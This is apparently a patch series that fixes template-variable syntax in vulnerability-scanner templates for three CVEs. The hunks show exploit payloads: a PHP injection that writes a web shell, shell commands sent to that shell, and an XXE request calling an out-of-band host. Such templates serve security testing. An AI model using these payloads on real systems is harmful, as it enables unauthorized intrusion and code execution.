From f1b20fd4de04517f9afe2669efbb439a00dc740a Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 3 Nov 2025 22:18:04 +0530 Subject: [PATCH 1/4] =?UTF-8?q?Revert=20"[ENHANCEMENT]=20Removing=20charac?= =?UTF-8?q?ter=20=C2=A7"?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- http/cves/2023/CVE-2023-46818.yaml | 6 +++--- http/cves/2025/CVE-2025-30220.yaml | 2 +- http/cves/2025/CVE-2025-52207.yaml | 2 +- 3 files changed, 5 insertions(+), 5 deletions(-) diff --git a/http/cves/2023/CVE-2023-46818.yaml b/http/cves/2023/CVE-2023-46818.yaml index 029dbe50e96..c202a426165 100644 --- a/http/cves/2023/CVE-2023-46818.yaml +++ b/http/cves/2023/CVE-2023-46818.yaml @@ -108,7 +108,7 @@ http: GET /admin/{{websh-file}} HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - C: {{base64('{{echo-cmd}}')}} + C: {{base64('§echo-cmd§')}} matchers-condition: and matchers: @@ -125,7 +125,7 @@ http: GET /admin/{{websh-file}} HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - C: {{base64('rm {{lang_file_location}}')}} + C: {{base64('rm §lang_file_location§')}} matchers: - type: status @@ -137,7 +137,7 @@ http: GET /admin/{{websh-file}} HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - C: {{base64('rm {{websh-file}}')}} + C: {{base64('rm §websh-file§')}} matchers: - type: status diff --git a/http/cves/2025/CVE-2025-30220.yaml b/http/cves/2025/CVE-2025-30220.yaml index 33faa9a3ddd..b890838d0c9 100644 --- a/http/cves/2025/CVE-2025-30220.yaml +++ b/http/cves/2025/CVE-2025-30220.yaml @@ -82,7 +82,7 @@ http: xmlns:wfs="http://www.opengis.net/wfs" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://a http://{{interactsh-url}}/xxe.xsd"> - + matchers: diff --git a/http/cves/2025/CVE-2025-52207.yaml b/http/cves/2025/CVE-2025-52207.yaml index b578da01614..9469a21a007 100644 --- a/http/cves/2025/CVE-2025-52207.yaml +++ b/http/cves/2025/CVE-2025-52207.yaml @@ -114,7 +114,7 @@ http: - method: GET path: - - "{{BaseURL}}/pbxcore/files/cache/{{extracted_path}}?{{wait_for(3)}}" + - "{{BaseURL}}/pbxcore/files/cache/§extracted_path§?{{wait_for(3)}}" matchers: - type: dsl From a90848eabd939de3db9270aa2efe5ca12e5c91a7 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 3 Nov 2025 22:28:15 +0530 Subject: [PATCH 2/4] Fix echo command and base64 encoding in CVE-2023-46818.yaml --- http/cves/2023/CVE-2023-46818.yaml | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/http/cves/2023/CVE-2023-46818.yaml b/http/cves/2023/CVE-2023-46818.yaml index c202a426165..b5f9ba9d5f1 100644 --- a/http/cves/2023/CVE-2023-46818.yaml +++ b/http/cves/2023/CVE-2023-46818.yaml @@ -34,7 +34,7 @@ variables: payload: "'];file_put_contents('{{websh-file}}',base64_decode('{{websh-base64}}'));die;#" payload-url-enc: "{{url_encode(payload)}}" echo-cmd-hash: "{{rand_text_alphanumeric(32)}}" - echo-cmd: "echo {{echo-cmd-hash}}" + echo-cmd: "echo (echo-cmd-hash}}" http: - raw: @@ -108,7 +108,7 @@ http: GET /admin/{{websh-file}} HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - C: {{base64('§echo-cmd§')}} + C: {{base64(echo-cmd)}} matchers-condition: and matchers: @@ -125,7 +125,7 @@ http: GET /admin/{{websh-file}} HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - C: {{base64('rm §lang_file_location§')}} + C: {{base64('rm ' + lang_file_location)}} matchers: - type: status @@ -137,10 +137,10 @@ http: GET /admin/{{websh-file}} HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - C: {{base64('rm §websh-file§')}} + C: {{base64('rm ' + websh-file)}} matchers: - type: status status: - 200 -# digest: 4a0a00473045022100d8a79f4057cef91ca12ffbb2b00486ed861f5e744f7c4187490ea1b58c3e0640022047996bc3fe5ab6a4a7d2ffa15b44bdb045abdf08cd81c7d752cdf69a8b970216:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d8a79f4057cef91ca12ffbb2b00486ed861f5e744f7c4187490ea1b58c3e0640022047996bc3fe5ab6a4a7d2ffa15b44bdb045abdf08cd81c7d752cdf69a8b970216:922c64590222798bb761d5b6d8e72950 From 59b3333f7677f26a2847c46cfc77675bc8191441 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 5 Nov 2025 12:50:59 +0530 Subject: [PATCH 3/4] Fix syntax error in CVE-2023-46818.yaml --- http/cves/2023/CVE-2023-46818.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2023/CVE-2023-46818.yaml b/http/cves/2023/CVE-2023-46818.yaml index b5f9ba9d5f1..8db545207a8 100644 --- a/http/cves/2023/CVE-2023-46818.yaml +++ b/http/cves/2023/CVE-2023-46818.yaml @@ -34,7 +34,7 @@ variables: payload: "'];file_put_contents('{{websh-file}}',base64_decode('{{websh-base64}}'));die;#" payload-url-enc: "{{url_encode(payload)}}" echo-cmd-hash: "{{rand_text_alphanumeric(32)}}" - echo-cmd: "echo (echo-cmd-hash}}" + echo-cmd: "echo {{echo-cmd-hash}}" http: - raw: From 6ec5e8b631fc98beb35ae1e4321546f4f138fa04 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 5 Nov 2025 12:54:00 +0530 Subject: [PATCH 4/4] fix {{ && }} --- http/cves/2025/CVE-2025-30220.yaml | 2 +- http/cves/2025/CVE-2025-52207.yaml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2025/CVE-2025-30220.yaml b/http/cves/2025/CVE-2025-30220.yaml index b890838d0c9..33faa9a3ddd 100644 --- a/http/cves/2025/CVE-2025-30220.yaml +++ b/http/cves/2025/CVE-2025-30220.yaml @@ -82,7 +82,7 @@ http: xmlns:wfs="http://www.opengis.net/wfs" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://a http://{{interactsh-url}}/xxe.xsd"> - + matchers: diff --git a/http/cves/2025/CVE-2025-52207.yaml b/http/cves/2025/CVE-2025-52207.yaml index 9469a21a007..b578da01614 100644 --- a/http/cves/2025/CVE-2025-52207.yaml +++ b/http/cves/2025/CVE-2025-52207.yaml @@ -114,7 +114,7 @@ http: - method: GET path: - - "{{BaseURL}}/pbxcore/files/cache/§extracted_path§?{{wait_for(3)}}" + - "{{BaseURL}}/pbxcore/files/cache/{{extracted_path}}?{{wait_for(3)}}" matchers: - type: dsl